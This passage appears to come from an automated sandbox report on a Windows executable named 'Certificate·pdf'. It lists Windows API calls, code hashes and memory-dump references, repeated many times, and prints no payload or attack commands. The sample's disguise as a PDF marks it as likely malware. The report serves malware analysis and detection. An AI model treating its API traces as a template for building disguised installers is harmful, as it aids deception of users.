          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Enum$CloseValue
          • String ID:
          • API String ID: 397863658-0
          • Opcode ID: 483f4d4475094cacbe2a8cc6776651ad36624d4f10963f9b9b76c2ffb75e4dd9
          • Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
          • Opcode Fuzzy Hash: 483f4d4475094cacbe2a8cc6776651ad36624d4f10963f9b9b76c2ffb75e4dd9
          • Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69
          APIs
          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
          • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CloseQueryValue
          • String ID:
          • API String ID: 3356406503-0
          • Opcode ID: e36128bb1b6e741cd68d9522df147e685498ba3c9d325e858177db0b4d3207af
          • Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
          • Opcode Fuzzy Hash: e36128bb1b6e741cd68d9522df147e685498ba3c9d325e858177db0b4d3207af
          • Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A
          APIs
          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
          • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
          • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
          • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
          APIs
          • OleInitialize.OLE32(00000000), ref: 004053E2
            • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
          • OleUninitialize.OLE32(00000404,00000000), ref: 0040542E
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: InitializeMessageSendUninitialize
          • String ID:
          • API String ID: 2896919175-0
          • Opcode ID: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
          • Instruction ID: 958387d264b6e353c5d11acff8941ae2ccbfc231999d5e23939142942d374e26
          • Opcode Fuzzy Hash: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
          • Instruction Fuzzy Hash: A8F024735009108BD3402B40ED02B6773A4EBC5301F05C03FEE84B22E1CB780C408B1E
          APIs
          • ShowWindow.USER32(00000000,00000000), ref: 00401E67
          • EnableWindow.USER32(00000000,00000000), ref: 00401E72
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Window$EnableShow
          • String ID:
          • API String ID: 1136574915-0
          • Opcode ID: 56fa2814269c28ffc6cd4c46df727e5f90e38ec81a6b85d2c904a37502f98665
          • Instruction ID: ed958cdb0af940290ad8e224458c39a91d35accb7d2f19645d781aa9a2f92111
          • Opcode Fuzzy Hash: 56fa2814269c28ffc6cd4c46df727e5f90e38ec81a6b85d2c904a37502f98665
          • Instruction Fuzzy Hash: ECE01A72E082008FE764ABA5AA495AD77B4EB91325B20847FE211F11D1DE7858418F6A
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: ShowWindow
          • String ID:
          • API String ID: 1268545403-0
          • Opcode ID: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
          • Instruction ID: ff893fd080683d27dd3b5e94bf1da30195128cfff23c54bbc30ea882265df843
          • Opcode Fuzzy Hash: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
          • Instruction Fuzzy Hash: DBE04876B141049BCB14CBA8DD8086E77A5A789310724457BD501B3650CA79AD50CF68
          APIs
          • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
          • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
            • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
            • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
            • Part of subcall function 00406601: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406667
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
          • String ID:
          • API String ID: 2547128583-0
          • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
          • Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
          • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
          • Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD
          APIs
          • GetFileAttributesW.KERNELBASE(007B6800,00402F1D,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: File$AttributesCreate
          • String ID:
          • API String ID: 415043291-0
          • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
          • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
          • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
          • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
          APIs
          • GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
          • Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
          • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
          • Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98
          APIs
          • CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CreateDirectoryErrorLast
          • String ID:
          • API String ID: 1375471231-0
          • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
          • Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
          • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
          • Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
          APIs
          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: PrivateProfileStringWrite
          • String ID:
          • API String ID: 390214022-0
          • Opcode ID: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
          • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
          • Opcode Fuzzy Hash: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
          • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
          APIs
          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Create
          • String ID:
          • API String ID: 2289755597-0
          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
          • Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
          • Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674
          APIs
          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
